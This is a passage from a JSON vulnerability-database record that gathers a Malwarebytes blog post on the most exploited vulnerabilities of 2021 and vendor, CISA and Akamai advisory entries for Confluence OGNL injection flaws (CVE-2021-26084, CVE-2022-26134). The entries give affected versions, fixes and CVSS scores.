[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014&quot;This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.&quot;\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these &quot;requirements&quot; move it to the top of your &quot;to-patch&quot; list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:08:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL\ninjection vulnerability exists that would allow an unauthenticated attacker\nto execute arbitrary code on a Confluence Server or Data Center instance.\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before\n7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0\nbefore 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T00:00:00", "id": "UB:CVE-2022-26134", "href": "https://ubuntu.com/security/CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2022-08-02T08:36:05", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-02T05:56:21", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T03:27:03", "description": "This is a duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-11T03:24:32", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:44:44", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-22T01:29:22", "id": "ATLASSIAN:CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T10:41:45", "description": "A user with a valid account on a Confluence Server or Data Center instance is able to execute arbitrary Java code or run arbitrary system commands by injecting an OGNL payload.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n\r\n\u00a0* version < 6.13.23\r\n\u00a0* 6.14.0 \u2264 version < 7.4.11\r\n\u00a0* 7.5.0 \u2264 version < 7.11.6\r\n\u00a0* 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n\r\n\u00a0* 6.13.23\r\n\u00a0* 7.4.11\r\n\u00a0* 7.11.6\r\n\u00a0* 7.12.5\r\n\u00a0* 7.13.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-27T03:55:57", "type": "atlassian", "title": "RCE on Confluence Data Center via OGNL Injection - CVE-2021-39114", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-39114"], "modified": "2022-06-01T02:34:36", "id": "CONFSERVER-68844", "href": "https://jira.atlassian.com/browse/CONFSERVER-68844", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T10:41:50", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.6\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-39114"], "modified": "2022-06-15T04:33:32", "id": "CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-06-14T17:56:54", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-06-14T17:05:44", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) that?s affecting Confluence Server and Data Center products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:00:00", "type": "akamaiblog", "title": "Akamai Protects Against the Atlassian Confluence 0-Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T09:00:00", "id": "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "href": "https://www.akamai.com/blog/security/akamai-protects-against-atlassian-confluence-0-day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T15:05:44", "description": "The Atlassian Confluence vulnerability is here to stay. See Akamai's research into the stats two weeks after the advisory was released.", "cvss3": {}, "published": "2022-06-28T13:00:00", "type": "akamaiblog", "title": "Akamai?s Observations of Confluence Zero Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-28T13:00:00", "id": "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "href": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection--cve-2021-26084---how-a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA-KEV-CVE-2022-26134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 contains an OGNL injection vulnerability which allows an attacker to execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server < 6.13.23, 6.14.0 - 7.12.5 Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-30T10:42:46", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 